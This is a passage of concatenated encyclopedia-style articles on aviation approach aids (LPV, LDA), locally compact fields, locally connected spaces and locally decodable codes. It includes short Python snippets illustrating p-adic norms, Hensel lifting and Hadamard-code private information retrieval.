LPV is designed to provide 25 feet (7.6 m) lateral and vertical accuracy 95 percent of the time. [ 6 ] Actual performance has exceeded these levels. WAAS has never been observed to have a vertical error greater than 12 metres in its operational history. [ citation needed ] As of September 17, 2015 the Federal Aviation Administration (FAA) has published 3,567 LPV approaches at 1,739 airports. As of October 7, 2021 the FAA has published 4,088 LPV approaches at 1,965 airports. This is greater than the number of published Category I ILS procedures. [ 7 ] | https://en.wikipedia.org/wiki/Localizer_performance_with_vertical_guidance |
A localizer type directional aid (LDA) or Instrument Guidance System (IGS) is a type of localizer -based instrument approach to an airport. It is used in places where, due to terrain and other factors, the localizer antenna array is not aligned with the runway it serves. In these cases, the localizer antenna array may be offset (i.e. pointed or aimed) in such a way that the approach course it projects no longer lies along the extended runway centerline (which is the norm for non-offset and non-LDA localizer systems). If the angle of offset is three degrees or less, the facility is classified as an offset localizer. If the offset angle is greater than three degrees, the facility is classified as a localizer-type directional aid (LDA). Straight-in approaches may be published if the offset angle does not exceed 30 degrees. Only circling minima are published for offset angles greater than 30 degrees. As a "directional aid", and only a Category I (CAT I) approach, rather than a full-fledged instrument landing system (ILS), the LDA is more commonly used to help the pilot safely reach a point near the runway environs from which the runway can be seen, at which point the pilot proceeds to land visually. This contrasts with (for example) full Category III (CAT III) ILS systems, which allow a pilot to fly, without visual references, very close to the runway surface (usually about 100 ft), depending on the exact equipment in the aircraft and on the ground.
An LDA uses exactly the same equipment to create the course as a standard localizer used in ILS . An LDA approach also is designed with a normal course width, which is typically 3 to 6 degrees. (At each "edge-of-course", commonly 1.5 or 3 degrees left and right of course, the transmitted signal is created in such a way as to ensure full-scale CDI needle deflection at and beyond these edges, so the pilot will never falsely believe they are intercepting the course outside of the actual course area. The area between these full-scale needle deflections is what defines the course width.) An LDA approach (considered a non-precision approach ) may have one or more marker beacons , perhaps a DME , and in rare instances a glide slope , just as other precision approaches have, such as ILS approaches.
If the offset is not greater than 30 degrees, straight-in approach minima may be published; circling minima only are published when offset exceeds 30 degrees. [ 1 ] [ 2 ]
The following 25 LDA approaches are available in the United States (as of November 2023): [ 3 ] [ 4 ] [ 5 ] | https://en.wikipedia.org/wiki/Localizer_type_directional_aid |
In algebra, a locally compact field is a topological field whose topology forms a locally compact Hausdorff space . [ 1 ] These kinds of fields were originally introduced in p-adic analysis since the fields Q p {\displaystyle \mathbb {Q} _{p}} of p-adic numbers are locally compact topological spaces constructed from the norm | ⋅ | p {\displaystyle |\cdot |_{p}} on Q {\displaystyle \mathbb {Q} } . The topology (and metric space structure) is essential because it allows one to construct analogues of algebraic number fields in the p-adic context.
One of the useful structure theorems for vector spaces over locally compact fields is that the finite dimensional vector spaces have only one equivalence class of norms: the sup norm . [ 2 ] pg. 58-59
Given a finite field extension K / F {\displaystyle K/F} of a locally compact field F {\displaystyle F} , there is at most one field norm | ⋅ | K {\displaystyle |\cdot |_{K}} on K {\displaystyle K} extending the field norm | ⋅ | F {\displaystyle |\cdot |_{F}} ; that is,
| f | K = | f | F {\displaystyle |f|_{K}=|f|_{F}}
for all f ∈ K {\displaystyle f\in K} which is in the image of F ↪ K {\displaystyle F\hookrightarrow K} . Note this follows from the previous theorem and the following trick: if ‖ ⋅ ‖ 1 , ‖ ⋅ ‖ 2 {\displaystyle \|\cdot \|_{1},\|\cdot \|_{2}} are two equivalent norms, and
‖ x ‖ 1 < ‖ x ‖ 2 {\displaystyle \|x\|_{1}<\|x\|_{2}}
then for a fixed constant c 1 {\displaystyle c_{1}} there exists an N 0 ∈ N {\displaystyle N_{0}\in \mathbb {N} } such that
( ‖ x ‖ 1 ‖ x ‖ 2 ) N < 1 c 1 {\displaystyle \left({\frac {\|x\|_{1}}{\|x\|_{2}}}\right)^{N}<{\frac {1}{c_{1}}}}
for all N ≥ N 0 {\displaystyle N\geq N_{0}} , since the sequence of powers ( ‖ x ‖ 1 / ‖ x ‖ 2 ) N {\displaystyle (\|x\|_{1}/\|x\|_{2})^{N}} converges to 0 {\displaystyle 0} .
If the extension is of degree n = [ K : F ] {\displaystyle n=[K:F]} and K / F {\displaystyle K/F} is a Galois extension , (so all solutions to the minimal polynomial , or conjugate elements , of any a ∈ K {\displaystyle a\in K} are also contained in K {\displaystyle K} ) then the unique field norm | ⋅ | K {\displaystyle |\cdot |_{K}} can be constructed using the field norm [ 2 ] pg. 61 . This is defined as
| a | K = | N K / F ( a ) | 1 / n {\displaystyle |a|_{K}=|N_{K/F}(a)|^{1/n}}
Note the n-th root is required in order to have a well-defined field norm extending the one over F {\displaystyle F} since given any f ∈ K {\displaystyle f\in K} in the image of F ↪ K {\displaystyle F\hookrightarrow K} its norm is
N K / F ( f ) = det m f = f n {\displaystyle N_{K/F}(f)=\det m_{f}=f^{n}}
since it acts as scalar multiplication on the F {\displaystyle F} -vector space K {\displaystyle K} .
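As a concrete sketch of this construction, consider the quadratic extension K = Q 5 ( 7 ) {\displaystyle K=\mathbb {Q} _{5}({\sqrt {7}})} discussed in the example below. Since N K / F ( a + b 7 ) = a 2 − 7 b 2 {\displaystyle N_{K/F}(a+b{\sqrt {7}})=a^{2}-7b^{2}} , the extended norm is | a + b 7 | K = | a 2 − 7 b 2 | 5 1 / 2 {\displaystyle |a+b{\sqrt {7}}|_{K}=|a^{2}-7b^{2}|_{5}^{1/2}} . The helper functions below are our own illustrative code, restricted to rational inputs.

```python
from fractions import Fraction

def v5(n):
    """5-adic valuation of a nonzero integer."""
    k = 0
    while n % 5 == 0:
        n //= 5
        k += 1
    return k

def norm5(q):
    """The 5-adic norm |q|_5 = 5^(-v5(q)) of a nonzero rational q."""
    q = Fraction(q)
    return Fraction(5) ** -(v5(q.numerator) - v5(q.denominator))

def norm_K(a, b):
    """|a + b*sqrt(7)|_K = |a^2 - 7*b^2|_5 ^ (1/2), with n = [K : F] = 2."""
    return float(norm5(Fraction(a) ** 2 - 7 * Fraction(b) ** 2)) ** 0.5

print(norm_K(5, 0))  # 0.2 = |5|_5: the extension agrees with |.|_5 on Q_5
print(norm_K(1, 1))  # |1 - 7|_5^(1/2) = 1.0
```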
All finite fields are locally compact since they can be equipped with the discrete topology . In particular, any field with the discrete topology is locally compact, since every singleton is an open neighborhood of its point and is also closed, hence compact.
The main examples of locally compact fields are the p-adic rationals Q p {\displaystyle \mathbb {Q} _{p}} and finite extensions K / Q p {\displaystyle K/\mathbb {Q} _{p}} . Each of these are examples of local fields . Note the algebraic closure Q ¯ p {\displaystyle {\overline {\mathbb {Q} }}_{p}} and its completion C p {\displaystyle \mathbb {C} _{p}} are not locally compact fields [ 2 ] pg. 72 with their standard topology.
Field extensions K / Q p {\displaystyle K/\mathbb {Q} _{p}} can be found by using Hensel's lemma . For example, f ( x ) = x 2 − 7 = x 2 − ( 2 + 1 ⋅ 5 ) {\displaystyle f(x)=x^{2}-7=x^{2}-(2+1\cdot 5)} has no solutions in Q 5 {\displaystyle \mathbb {Q} _{5}} since
d d x ( x 2 − 7 ) = 2 x {\displaystyle {\frac {d}{dx}}(x^{2}-7)=2x}
only equals zero mod p {\displaystyle p} if x ≡ 0 ( p ) {\displaystyle x\equiv 0{\text{ }}(p)} , but x 2 − 7 {\displaystyle x^{2}-7} has no solutions mod 5 {\displaystyle 5} . Hence Q 5 ( 7 ) / Q 5 {\displaystyle \mathbb {Q} _{5}({\sqrt {7}})/\mathbb {Q} _{5}} is a quadratic field extension. | https://en.wikipedia.org/wiki/Locally_compact_field |
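The mod-5 computations behind this example, together with a contrasting case where Hensel's lemma does apply, can be sketched as follows (the choice x² − 6, which does have a simple root mod 5, is our own illustrative assumption):

```python
# Squares mod 5 are {0, 1, 4}; since 7 = 2 (mod 5) is not among them,
# x^2 - 7 has no root mod 5 and hence no root in Q_5.
print(sorted({(x * x) % 5 for x in range(5)}), 7 % 5)

# By contrast, x^2 - 6 has the simple root x = 1 mod 5 (as 6 = 1 mod 5),
# and the Newton/Hensel iteration lifts it digit by digit: the update
# x <- x - f(x) / f'(x) mod 5^k is valid because f'(x) = 2x is a unit mod 5.
x = 1
for k in range(2, 8):
    m = 5 ** k
    x = (x - (x * x - 6) * pow(2 * x, -1, m)) % m
    print(k, x, (x * x - 6) % m)  # the residual is 0 mod 5^k at every step
```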
In topology and other branches of mathematics , a topological space X is locally connected if every point admits a neighbourhood basis consisting of open connected sets.
As a stronger notion, the space X is locally path connected if every point admits a neighbourhood basis consisting of open path connected sets.
Throughout the history of topology, connectedness and compactness have been two of the most widely studied topological properties. Indeed, the study of these properties even among subsets of Euclidean space , and the recognition of their independence from the particular form of the Euclidean metric , played a large role in clarifying the notion of a topological property and thus a topological space. However, whereas the structure of compact subsets of Euclidean space was understood quite early on via the Heine–Borel theorem , connected subsets of R n {\displaystyle \mathbb {R} ^{n}} (for n > 1) proved to be much more complicated. Indeed, while any compact Hausdorff space is locally compact , a connected space (and even a connected subset of the Euclidean plane) need not be locally connected (see below).
This led to a rich vein of research in the first half of the twentieth century, in which topologists studied the implications between increasingly subtle and complex variations on the notion of a locally connected space. As an example, the notion of connectedness im kleinen at a point and its relation to local connectedness will be considered later on in the article.
In the latter part of the twentieth century, research trends shifted to more intense study of spaces like manifolds , which are locally well understood (being locally homeomorphic to Euclidean space) but have complicated global behavior. By this it is meant that although the basic point-set topology of manifolds is relatively simple (as manifolds are essentially metrizable according to most definitions of the concept), their algebraic topology is far more complex. From this modern perspective, the stronger property of local path connectedness turns out to be more important: for instance, in order for a space to admit a universal cover it must be connected and locally path connected.
A space is locally connected if and only if for every open set U , the connected components of U (in the subspace topology ) are open. It follows, for instance, that a continuous function from a locally connected space to a totally disconnected space must be locally constant. In fact the openness of components is so natural that one must be sure to keep in mind that it is not true in general: for instance Cantor space is totally disconnected but not discrete .
Let X {\displaystyle X} be a topological space, and let x {\displaystyle x} be a point of X . {\displaystyle X.}
A space X {\displaystyle X} is called locally connected at x {\displaystyle x} [ 1 ] if every neighborhood of x {\displaystyle x} contains a connected open neighborhood of x {\displaystyle x} , that is, if the point x {\displaystyle x} has a neighborhood base consisting of connected open sets. A locally connected space [ 2 ] [ 1 ] is a space that is locally connected at each of its points.
Local connectedness does not imply connectedness (consider two disjoint open intervals in R {\displaystyle \mathbb {R} } for example); and connectedness does not imply local connectedness (see the topologist's sine curve ).
A space X {\displaystyle X} is called locally path connected at x {\displaystyle x} [ 1 ] if every neighborhood of x {\displaystyle x} contains a path connected open neighborhood of x {\displaystyle x} , that is, if the point x {\displaystyle x} has a neighborhood base consisting of path connected open sets. A locally path connected space [ 3 ] [ 1 ] is a space that is locally path connected at each of its points.
Locally path connected spaces are locally connected. The converse does not hold (see the lexicographic order topology on the unit square ).
A space X {\displaystyle X} is called connected im kleinen at x {\displaystyle x} [ 4 ] [ 5 ] or weakly locally connected at x {\displaystyle x} [ 6 ] if every neighborhood of x {\displaystyle x} contains a connected (not necessarily open) neighborhood of x {\displaystyle x} , that is, if the point x {\displaystyle x} has a neighborhood base consisting of connected sets. A space is called weakly locally connected if it is weakly locally connected at each of its points; as indicated below, this concept is in fact the same as being locally connected.
A space that is locally connected at x {\displaystyle x} is connected im kleinen at x . {\displaystyle x.} The converse does not hold, as shown for example by a certain infinite union of decreasing broom spaces , which is connected im kleinen at a particular point but not locally connected at that point. [ 7 ] [ 8 ] [ 9 ] However, if a space is connected im kleinen at each of its points, it is locally connected. [ 10 ]
A space X {\displaystyle X} is said to be path connected im kleinen at x {\displaystyle x} [ 5 ] if every neighborhood of x {\displaystyle x} contains a path connected (not necessarily open) neighborhood of x {\displaystyle x} , that is, if the point x {\displaystyle x} has a neighborhood base consisting of path connected sets.
A space that is locally path connected at x {\displaystyle x} is path connected im kleinen at x . {\displaystyle x.} The converse does not hold, as shown by the same infinite union of decreasing broom spaces as above. However, if a space is path connected im kleinen at each of its points, it is locally path connected. [ 11 ] [ better source needed ]
A first-countable Hausdorff space ( X , τ ) {\displaystyle (X,\tau )} is locally path-connected if and only if τ {\displaystyle \tau } is equal to the final topology on X {\displaystyle X} induced by the set C ( [ 0 , 1 ] ; X ) {\displaystyle C([0,1];X)} of all continuous paths [ 0 , 1 ] → ( X , τ ) . {\displaystyle [0,1]\to (X,\tau ).}
Theorem — A space is locally connected if and only if it is weakly locally connected. [ 10 ]
For the non-trivial direction, assume X {\displaystyle X} is weakly locally connected. To show it is locally connected, it is enough to show that the connected components of open sets are open.
Let U {\displaystyle U} be open in X {\displaystyle X} and let C {\displaystyle C} be a connected component of U . {\displaystyle U.} Let x {\displaystyle x} be an element of C . {\displaystyle C.} Then U {\displaystyle U} is a neighborhood of x {\displaystyle x} so that there is a connected neighborhood V {\displaystyle V} of x {\displaystyle x} contained in U . {\displaystyle U.} Since V {\displaystyle V} is connected and contains x , {\displaystyle x,} V {\displaystyle V} must be a subset of C {\displaystyle C} (the connected component containing x {\displaystyle x} ). Therefore x {\displaystyle x} is an interior point of C . {\displaystyle C.} Since x {\displaystyle x} was an arbitrary point of C , {\displaystyle C,} C {\displaystyle C} is open in X . {\displaystyle X.} Therefore, X {\displaystyle X} is locally connected.
The following result follows almost immediately from the definitions but will be quite useful:
Lemma: Let X be a space, and { Y i } {\displaystyle \{Y_{i}\}} a family of subsets of X . Suppose that ⋂ i Y i {\displaystyle \bigcap _{i}Y_{i}} is nonempty. Then, if each Y i {\displaystyle Y_{i}} is connected (respectively, path connected) then the union ⋃ i Y i {\displaystyle \bigcup _{i}Y_{i}} is connected (respectively, path connected). [ 16 ]
Now consider two relations on a topological space X : for x , y ∈ X , {\displaystyle x,y\in X,} write x ≡ c y {\displaystyle x\equiv _{c}y} if there is a connected subset of X containing both x and y , and write x ≡ p c y {\displaystyle x\equiv _{pc}y} if there is a path connected subset of X containing both x and y .
Evidently both relations are reflexive and symmetric. Moreover, if x and y are contained in a connected (respectively, path connected) subset A and y and z are connected in a connected (respectively, path connected) subset B , then the Lemma implies that A ∪ B {\displaystyle A\cup B} is a connected (respectively, path connected) subset containing x , y and z . Thus each relation is an equivalence relation , and defines a partition of X into equivalence classes . We consider these two partitions in turn.
For x in X , the set C x {\displaystyle C_{x}} of all points y such that y ≡ c x {\displaystyle y\equiv _{c}x} is called the connected component of x . [ 17 ] The Lemma implies that C x {\displaystyle C_{x}} is the unique maximal connected subset of X containing x . [ 18 ] Since the closure of C x {\displaystyle C_{x}} is also a connected subset containing x , [ 19 ] [ 20 ] it follows that C x {\displaystyle C_{x}} is closed. [ 21 ]
If X has only finitely many connected components, then each component is the complement of a finite union of closed sets and therefore open. In general, the connected components need not be open, since, e.g., there exist totally disconnected spaces (i.e., C x = { x } {\displaystyle C_{x}=\{x\}} for all points x ) that are not discrete, like Cantor space. However, the connected components of a locally connected space are also open, and thus are clopen sets . [ 22 ] It follows that a locally connected space X is a topological disjoint union ∐ C x {\displaystyle \coprod C_{x}} of its distinct connected components. Conversely, if for every open subset U of X , the connected components of U are open, then X admits a base of connected sets and is therefore locally connected. [ 23 ]
Similarly x in X , the set P C x {\displaystyle PC_{x}} of all points y such that y ≡ p c x {\displaystyle y\equiv _{pc}x} is called the path component of x . [ 24 ] As above, P C x {\displaystyle PC_{x}} is also the union of all path connected subsets of X that contain x , so by the Lemma is itself path connected. Because path connected sets are connected, we have P C x ⊆ C x {\displaystyle PC_{x}\subseteq C_{x}} for all x ∈ X . {\displaystyle x\in X.}
However the closure of a path connected set need not be path connected: for instance, the topologist's sine curve is the closure of the open subset U consisting of all points ( x , sin(1/ x )) with x > 0 , and U , being homeomorphic to an interval on the real line, is certainly path connected. Moreover, the path components of the topologist's sine curve C are U , which is open but not closed, and C ∖ U , {\displaystyle C\setminus U,} which is closed but not open.
A space is locally path connected if and only if for all open subsets U , the path components of U are open. [ 24 ] Therefore the path components of a locally path connected space give a partition of X into pairwise disjoint open sets. It follows that an open connected subspace of a locally path connected space is necessarily path connected. [ 25 ] Moreover, if a space is locally path connected, then it is also locally connected, so for all x ∈ X , {\displaystyle x\in X,} C x {\displaystyle C_{x}} is connected and open, hence path connected, that is, C x = P C x . {\displaystyle C_{x}=PC_{x}.} That is, for a locally path connected space the components and path components coincide.
Let X be a topological space. We define a third relation on X : x ≡ q c y {\displaystyle x\equiv _{qc}y} if there is no separation of X into open sets A and B such that x is an element of A and y is an element of B . This is an equivalence relation on X and the equivalence class Q C x {\displaystyle QC_{x}} containing x is called the quasicomponent of x . [ 18 ]
Q C x {\displaystyle QC_{x}} can also be characterized as the intersection of all clopen subsets of X that contain x . [ 18 ] Accordingly Q C x {\displaystyle QC_{x}} is closed; in general it need not be open.
Evidently C x ⊆ Q C x {\displaystyle C_{x}\subseteq QC_{x}} for all x ∈ X . {\displaystyle x\in X.} [ 18 ] Overall we have the following containments among path components, components and quasicomponents at x : P C x ⊆ C x ⊆ Q C x . {\displaystyle PC_{x}\subseteq C_{x}\subseteq QC_{x}.}
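A standard example, included here to illustrate that the containment C x ⊆ Q C x {\displaystyle C_{x}\subseteq QC_{x}} can be strict, is the plane subspace X = ( { 0 } × { 0 , 1 } ) ∪ ⋃ n ≥ 1 ( { 1 / n } × [ 0 , 1 ] ) {\displaystyle X=(\{0\}\times \{0,1\})\cup \bigcup _{n\geq 1}(\{1/n\}\times [0,1])} . The component of the point p = ( 0 , 0 ) {\displaystyle p=(0,0)} is the singleton { p } {\displaystyle \{p\}} , since each vertical segment { 1 / n } × [ 0 , 1 ] {\displaystyle \{1/n\}\times [0,1]} is clopen in X , so no connected subset containing p {\displaystyle p} can meet any segment. However, every clopen set containing p {\displaystyle p} must contain all but finitely many of the segments, and hence (being closed) also their limit point ( 0 , 1 ) {\displaystyle (0,1)} ; thus Q C p = { ( 0 , 0 ) , ( 0 , 1 ) } {\displaystyle QC_{p}=\{(0,0),(0,1)\}} , strictly larger than C p {\displaystyle C_{p}} .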
If X is locally connected, then, as above, C x {\displaystyle C_{x}} is a clopen set containing x , so Q C x ⊆ C x {\displaystyle QC_{x}\subseteq C_{x}} and thus Q C x = C x . {\displaystyle QC_{x}=C_{x}.} Since local path connectedness implies local connectedness, it follows that at all points x of a locally path connected space we have P C x = C x = Q C x . {\displaystyle PC_{x}=C_{x}=QC_{x}.}
Another class of spaces for which the quasicomponents agree with the components is the class of compact Hausdorff spaces. [ 26 ] | https://en.wikipedia.org/wiki/Locally_connected_space |
A locally decodable code ( LDC ) is an error-correcting code that allows a single bit of the original message to be decoded with high probability by only examining (or querying) a small number of bits of a possibly corrupted codeword . [ 1 ] [ 2 ] [ 3 ] This property could be useful, say, in a context where information is being transmitted over a noisy channel, and only a small subset of the data is required at a particular time and there is no need to decode the entire message at once. Locally decodable codes are not a subset of locally testable codes , though there is some overlap between the two. [ 4 ]
Codewords are generated from the original message using an algorithm that introduces a certain amount of redundancy into the codeword; thus, the codeword is always longer than the original message. This redundancy is distributed across the codeword and allows the original message to be recovered with good probability even in the presence of errors. The more redundant the codeword, the more resilient it is against errors, and the fewer queries required to recover a bit of the original message.
More formally, a ( q , δ , ϵ ) {\displaystyle (q,\delta ,\epsilon )} -locally decodable code encodes an n {\displaystyle n} -bit message x {\displaystyle x} to an N {\displaystyle N} -bit codeword C ( x ) {\displaystyle C(x)} such that any bit x i {\displaystyle x_{i}} of the message can be recovered with probability 1 − ϵ {\displaystyle 1-\epsilon } by using a randomized decoding algorithm that queries only q {\displaystyle q} bits of the codeword C ( x ) {\displaystyle C(x)} , even if up to δ N {\displaystyle \delta N} locations of the codeword have been corrupted.
Furthermore, a perfectly smooth local decoder is a decoder such that, in addition to always generating the correct output given access to an uncorrupted codeword, for every j ∈ [ q ] {\displaystyle j\in [q]} and i ∈ [ n ] {\displaystyle i\in [n]} the j t h {\displaystyle j^{th}} query to recover the i t h {\displaystyle i^{th}} bit is uniform over [ N ] {\displaystyle [N]} . [ 5 ] (The notation [ y ] {\displaystyle [y]} denotes the set { 1 , … , y } {\displaystyle \{1,\ldots ,y\}} ). Informally, this means that each of the queries used to decode any given bit is uniformly distributed over the codeword.
Local list decoders are another interesting subset of local decoders. List decoding is useful when a codeword is corrupted in more than δ / 2 {\displaystyle \delta /2} places, where δ {\displaystyle \delta } is the minimum Hamming distance between two codewords. In this case, it is no longer possible to identify exactly which original message has been encoded, since there could be multiple codewords within δ {\displaystyle \delta } distance of the corrupted codeword. However, given a radius ϵ {\displaystyle \epsilon } , it is possible to identify the set of messages that encode to codewords that are within ϵ {\displaystyle \epsilon } of the corrupted codeword. An upper bound on the size of the set of messages can be determined by δ {\displaystyle \delta } and ϵ {\displaystyle \epsilon } . [ 6 ]
Locally decodable codes can also be concatenated, where a message is encoded first using one scheme, and the resulting codeword is encoded again using a different scheme. (Note that, in this context, concatenation is the term used by scholars to refer to what is usually called composition ; see [ 5 ] ). This might be useful if, for example, the first code has some desirable properties with respect to rate, but it has some undesirable property, such as producing a codeword over a non-binary alphabet. The second code can then transform the result of the first encoding over a non-binary alphabet to a binary alphabet. The final encoding is still locally decodable, and requires additional steps to decode both layers of encoding. [ 7 ]
The rate of a code refers to the ratio between its message length and codeword length: | x | | C ( x ) | {\displaystyle {\frac {|x|}{|C(x)|}}} , and the number of queries required to recover 1 bit of the message is called the query complexity of a code.
The rate of a code is inversely related to the query complexity, but the exact shape of this tradeoff is a major open problem . [ 8 ] [ 9 ] It is known that there are no LDCs that query the codeword in only one position, and that the optimal codeword size for query complexity 2 is exponential in the size of the original message. [ 8 ] However, there are no known tight lower bounds for codes with query complexity greater than 2. Approaching the tradeoff from the side of codeword length, the only known codes with codeword length proportional to message length have query complexity k ϵ {\displaystyle k^{\epsilon }} for ϵ > 0 {\displaystyle \epsilon >0} . [ 8 ] [ needs update ] There are also codes in between that have codewords polynomial in the size of the original message and polylogarithmic query complexity. [ 8 ]
Locally decodable codes have applications to data transmission and storage, complexity theory, data structures, derandomization, theory of fault tolerant computation, and private information retrieval schemes. [ 9 ]
Locally decodable codes are especially useful for data transmission over noisy channels. The Hadamard code (a special case of Reed Muller codes) was used in 1971 by Mariner 9 to transmit pictures of Mars back to Earth. It was chosen over a 5-repeat code (where each bit is repeated 5 times) because, for roughly the same number of bits transmitted per pixel, it had a higher capacity for error correction. (The Hadamard code falls under the general umbrella of forward error correction , and just happens to be locally decodable; the actual algorithm used to decode the transmission from Mars was a generic error-correction scheme.) [ 10 ]
LDCs are also useful for data storage, where the medium may become partially corrupted over time, or the reading device is subject to errors. In both cases, an LDC will allow for the recovery of information despite errors, provided that there are relatively few. In addition, LDCs do not require that the entire original message be decoded; a user can decode a specific portion of the original message without needing to decode the entire thing. [ 11 ]
One of the applications of locally decodable codes in complexity theory is hardness amplification. Using LDCs with polynomial codeword length and polylogarithmic query complexity, one can take a function L : { 0 , 1 } n → { 0 , 1 } {\displaystyle L:\{0,1\}^{n}\rightarrow \{0,1\}} that is hard to solve on worst case inputs and design a function L ′ : { 0 , 1 } N → { 0 , 1 } {\displaystyle L':\{0,1\}^{N}\rightarrow \{0,1\}} that is hard to compute on average case inputs.
Consider L {\displaystyle L} limited to only length t {\displaystyle t} inputs. Then we can see L {\displaystyle L} as a binary string of length 2 t {\displaystyle 2^{t}} , where each bit is L ( x ) {\displaystyle L(x)} for each x ∈ { 0 , 1 } t {\displaystyle x\in \{0,1\}^{t}} . We can use a polynomial length locally decodable code C {\displaystyle C} with polylogarithmic query complexity that tolerates some constant fraction of errors to encode the string that represents L {\displaystyle L} to create a new string of length 2 O ( t ) = 2 t ′ {\displaystyle 2^{O(t)}=2^{t'}} . We think of this new string as defining a new problem L ′ {\displaystyle L'} on length t ′ {\displaystyle t'} inputs. If L ′ {\displaystyle L'} is easy to solve on average, that is, we can solve L ′ {\displaystyle L'} correctly on a large fraction 1 − ϵ {\displaystyle 1-\epsilon } of inputs, then by the properties of the LDC used to encode it, we can use L ′ {\displaystyle L'} to probabilistically compute L {\displaystyle L} on all inputs. Thus, a solution to L ′ {\displaystyle L'} for most inputs would allow us to solve L {\displaystyle L} on all inputs, contradicting our assumption that L {\displaystyle L} is hard on worst case inputs. [ 5 ] [ 8 ] [ 12 ]
A private information retrieval scheme allows a user to retrieve an item from a server in possession of a database without revealing which item is retrieved. One common way of ensuring privacy is to have k {\displaystyle k} separate, non-communicating servers, each with a copy of the database. Given an appropriate scheme, the user can make queries to each server that individually do not reveal which bit the user is looking for, but which together provide enough information that the user can determine the particular bit of interest in the database. [ 3 ] [ 11 ]
One can easily see that locally decodable codes have applications in this setting. A general procedure to produce a k {\displaystyle k} -server private information scheme from a perfectly smooth k {\displaystyle k} -query locally decodable code is as follows:
Let C {\displaystyle C} be a perfectly smooth LDC that encodes n {\displaystyle n} -bit messages to N {\displaystyle N} -bit codewords. As a preprocessing step, each of the k {\displaystyle k} servers S 1 , … , S k {\displaystyle S_{1},\ldots ,S_{k}} encodes the n {\displaystyle n} -bit database x {\displaystyle x} with the code C {\displaystyle C} , so each server now stores the N {\displaystyle N} -bit codeword C ( x ) {\displaystyle C(x)} . A user interested in obtaining the i t h {\displaystyle i^{th}} bit of x {\displaystyle x} randomly generates a set of k {\displaystyle k} queries q 1 , … q k {\displaystyle q_{1},\ldots q_{k}} such that x i {\displaystyle x_{i}} can be computed from C ( x ) q 1 , … C ( x ) q k {\displaystyle C(x)_{q_{1}},\ldots C(x)_{q_{k}}} using the local decoding algorithm A {\displaystyle A} for C {\displaystyle C} . The user sends each query to a different server, and each server responds with the bit requested. The user then uses A {\displaystyle A} to compute x i {\displaystyle x_{i}} from the responses. [ 8 ] [ 11 ] Because the decoding algorithm is perfectly smooth, each query q j {\displaystyle q_{j}} is uniformly distributed over the codeword; thus, no individual server can gain any information about the user's intentions, so the protocol is private as long as the servers do not communicate. [ 11 ]
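The construction above can be sketched concretely by instantiating it (as an assumption for illustration) with the 2-query Hadamard code described in the next section; here the two "servers" are just functions holding the same database.

```python
import numpy as np

rng = np.random.default_rng(0)
n = 8
x = rng.integers(0, 2, size=n)      # the n-bit database, held by both servers

def server_answer(q):
    """Each server returns one Hadamard codeword bit: <x, q> mod 2."""
    return int(np.dot(x, q) % 2)

i = 5                               # the index the user wants to retrieve
e_i = np.zeros(n, dtype=int)
e_i[i] = 1

q1 = rng.integers(0, 2, size=n)     # uniformly random query to server 1
q2 = (q1 + e_i) % 2                 # q1 XOR e_i; also uniform on its own

# Each query alone is uniformly distributed, so neither server learns i,
# yet the XOR of the two answers is exactly <x, e_i> = x_i.
a1, a2 = server_answer(q1), server_answer(q2)
print((a1 + a2) % 2 == x[i])        # True
```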
The Hadamard (or Walsh-Hadamard) code is an example of a simple locally decodable code that maps a string of length k {\displaystyle k} to a codeword of length 2 k {\displaystyle 2^{k}} . The codeword for a string x ∈ { 0 , 1 } k {\displaystyle x\in \{0,1\}^{k}} is constructed as follows: for every a j ∈ { 0 , 1 } k {\displaystyle a_{j}\in \{0,1\}^{k}} , the j t h {\displaystyle j^{th}} bit of the codeword is equal to x ⊙ a j {\displaystyle x\odot a_{j}} , where x ⊙ y = ∑ i = 1 k x i y i {\displaystyle x\odot y=\sum \limits _{i=1}^{k}x_{i}y_{i}} (mod 2). It is easy to see that every codeword has a Hamming distance of 2 k − 1 {\displaystyle 2^{k-1}} (half the codeword length) from every other codeword.
The local decoding algorithm has query complexity 2, and the entire original message can be decoded with good probability if the codeword is corrupted in less than 1 4 {\displaystyle {\frac {1}{4}}} of its bits. For ρ < 1 4 {\displaystyle \rho <{\frac {1}{4}}} , if the codeword is corrupted in a ρ {\displaystyle \rho } fraction of places, a local decoding algorithm can recover the i t h {\displaystyle i^{th}} bit of the original message with probability 1 − 2 ρ {\displaystyle 1-2\rho } .
Proof: Given a codeword H {\displaystyle H} and an index i {\displaystyle i} , the algorithm to recover the i t h {\displaystyle i^{th}} bit of the original message x {\displaystyle x} works as follows:
Let e j {\displaystyle e^{j}} refer to the vector in { 0 , 1 } k {\displaystyle \{0,1\}^{k}} that has 1 in the j t h {\displaystyle j^{th}} position and 0s elsewhere. For y ∈ { 0 , 1 } k {\displaystyle y\in \{0,1\}^{k}} , f ( y ) {\displaystyle f(y)} denotes the single bit in H {\displaystyle H} that corresponds to x ⊙ y {\displaystyle x\odot y} . The algorithm chooses a random vector y ∈ { 0 , 1 } k {\displaystyle y\in \{0,1\}^{k}} and the vector y ′ = y ⊕ e i {\displaystyle y'=y\oplus e^{i}} (where ⊕ {\displaystyle \oplus } denotes bitwise XOR ). The algorithm outputs f ( y ) ⊕ f ( y ′ ) {\displaystyle f(y)\oplus f(y')} (mod 2).
Correctness: By linearity,
( x ⊙ y ) ⊕ ( x ⊙ y ′ ) = ( x ⊙ y ) ⊕ ( x ⊙ ( y ⊕ e i ) ) = ( x ⊙ y ) ⊕ ( x ⊙ y ) ⊕ ( x ⊙ e i ) = x ⊙ e i {\displaystyle (x\odot y)\oplus (x\odot y')=(x\odot y)\oplus (x\odot (y\oplus e^{i}))=(x\odot y)\oplus (x\odot y)\oplus (x\odot e^{i})=x\odot e^{i}}
But ( x ⊙ e i ) = x i {\displaystyle (x\odot e^{i})=x_{i}} , so we just need to show that f ( y ) = x ⊙ y {\displaystyle f(y)=x\odot y} and f ( y ′ ) = x ⊙ y ′ {\displaystyle f(y')=x\odot y'} with good probability.
Since y {\displaystyle y} and y ′ {\displaystyle y'} are uniformly distributed (even though they are dependent), the union bound implies that f ( y ) = x ⊙ y {\displaystyle f(y)=x\odot y} and f ( y ′ ) = x ⊙ y ′ {\displaystyle f(y')=x\odot y'} with probability at least 1 − 2 ρ {\displaystyle 1-2\rho } . Note: to amplify the probability of success, one can repeat the procedure with different random vectors and take the majority answer. [ 13 ]
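A runnable sketch of this decoder (parameters such as k = 10 and ρ = 0.1 are illustrative): it builds the full 2^k-bit codeword, flips a random ρ fraction of its bits, and recovers one message bit from two queries, using the majority-vote amplification suggested above.

```python
import numpy as np

rng = np.random.default_rng(1)
k = 10
x = rng.integers(0, 2, size=k)

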